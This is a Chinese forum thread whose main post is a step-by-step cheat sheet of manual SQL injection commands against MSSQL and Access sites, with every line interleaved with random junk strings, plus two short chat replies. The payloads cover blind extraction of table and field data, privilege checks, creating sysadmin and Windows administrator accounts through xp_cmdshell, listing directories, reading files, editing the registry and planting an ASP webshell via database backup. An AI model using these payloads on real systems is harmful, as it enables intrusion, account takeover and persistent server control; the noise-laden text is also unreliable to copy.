社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3566阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 :qj;f];|  
  2.初步判断是否是mssql ;and user>0 0*oavY*  
pjoyMHWK  
  3.注入参数是字符'and [查询条件] and ''=' TXf60{:f  
UWK|_RT6SA  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' y9LO;{(  
q"DHMZB  
  5.判断数据库系统 n6M#Xc'JA  
^Oeixi@f  
  ;and (select count(*) from sysobjects)>0 mssql YU)%-V\  
v"mZy,u  
  ;and (select count(*) from msysobjects)>0 access ~Cg7  
D&G?Klq  
>ke.ZZV?  
' u;Zw%O(J  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 j(K)CHH  
Iu5 9W >  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 G!G:YVWXP  
261? 8&c  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 h+&iWb3;  
vW!O("\7K<  
  9.(1)猜字段的ascii值(access) jAv3qMQA  
mpVD;)?JmM  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 R?/xH=u>  
wPu.hVz  
  (2)猜字段的ascii值(mssql) \&ZEIAe  
Doq}UWp  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #n15_cd  
B.;@i;7L  
  10.测试权限结构(mssql) qN9 ?$\  
>H5t,FfQL  
KsK]y,^Z  
jvD_{r  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 11Qi _T\  
%|^,Q -i,  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- *tk=DsRW  
fo`R=|L[  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- i_*.  
?z6K/'?  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 1[#sHj$Na`  
BafNF Pc  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- .J&89I]U  
"L1LL iS  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 05\0g9  
K :+q9;g  
  ;and 1=(select IS_MEMBER('db_owner'));-- skTa IGRL  
/vi Ic %=  
,O:p`"3`0=  
< 3*q) VT  
  11.添加mssql和系统的帐户 m|x_++3  
6#K.n&=*  
  ;exec master.dbo.sp_addlogin username;-- Ruq>+ }4  
  ;exec master.dbo.sp_password null,username,password;-- IMM sOl  
1>Vq<z  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- L;L_$hu)  
K`uPPyv  
  ;exec master.dbo.xp_cmdshell 'net user username password Ui9;rh$1eU  
ADB)-!$xoi  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- B]}gfVO  
"x HK*  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- Mqk|H~l5c  
Qt_KUtD  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- eY^zs0  
qwnVtD  
>SziRm>Y7  
c=bK_Z_  
  12.(1)遍历目录 cXf/  
V?) V2>]  
  ;create table dirs(paths varchar(100), id int) l,(:~KH|  
%H&WihQ  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' n5BD0q  
#902x*Z'c"  
  ;and (select top 1 paths from dirs)>0 +/kOUz/]  
re#]zc<  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) K"5q387!  
>+.GBf<E  
+oO7UWs>6  
m-;8O /  
  (2)遍历目录 Fv$w:r]q6  
)p>p3b g  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- W?P4oKsql*  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 7t}s5}Z 4  
"$K]+0ryG<  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 T"C.>G'[B  
!TY0;is  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 #Yp&yi }  
V51kX{S  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 YDYNAOThnb  
f? GoBh<  
XkoPN]0n  
~]?EV?T  
  13.mssql中的存储过程 KHC Fz  
On!+7is'  
  xp_regenumvalues 注册表根键, 子键 0:4>rYBC   
kRbJK  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 0c!^=(  
<&O*' <6C  
  xp_regread 根键,子键,键值名 0raFb,6l  
DcM/p8da  
  ;exec xp_regread &0|Z FXPd  
kjdIk9 Y  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 \pTC[Ry1  
t98S[Z(-%+  
  xp_regwrite 根键,子键, 值名, 值类型, 值 c~OPH 0,  
AS~!YR  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 5A|d hw   
N `fFYO  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ;1nXJ{jKw  
S# baOO  
  xp_regdeletevalue 根键,子键,值名 rLmc(-q  
BB V>Q L  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ;/?w-)n?  
NRT]dYf"z  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 `ZM$\Q=:  
Z0y~%[1X  
.v'`TD).6  
J>;r(j  
  14.mssql的backup创建webshell ^*B@=  
gYk5}E-  
  use model mSZg;7DE3*  
?P>4H0@I+  
  create table cmd(str image); di9OQ*6a7  
,mi7WW9  
  insert into cmd(str) values (''); gn~^Ajo  
F!/-2u5gF  
  backup database model to disk='c:\l.asp'; VSV]6$~H  
c9CFGo?)N  
ME]89 T &  
CH| cK8q  
  15.mssql内置函数 -m>3@"q  
fB,eeT1v?h  
  ;and (select @@version)>0 获得Windows的版本号 Y hmveV  
J:ka@2>|  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa gV h&c 4  
l`:u5\ rM  
  ;and (select user_name())>0 爆当前系统的连接用户 B3?rR-2mEE  
P2C>IS  
  ;and (select db_name())>0 得到当前连接的数据库 J65:MaS  
2*#i/SE_  
"_dg$j`Y&&  
Y}t)!}p$r  
  16.简洁的webshell wpi$-i`  
vZ57 S13  
  use model ZUS5z+o  
5VQ-D`kE+  
  create table cmd(str image); c|aX4=Z  
W+U0Y,N6  
  insert into cmd(str) values (''); CQa8I2VF (  
-U A &Zt  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八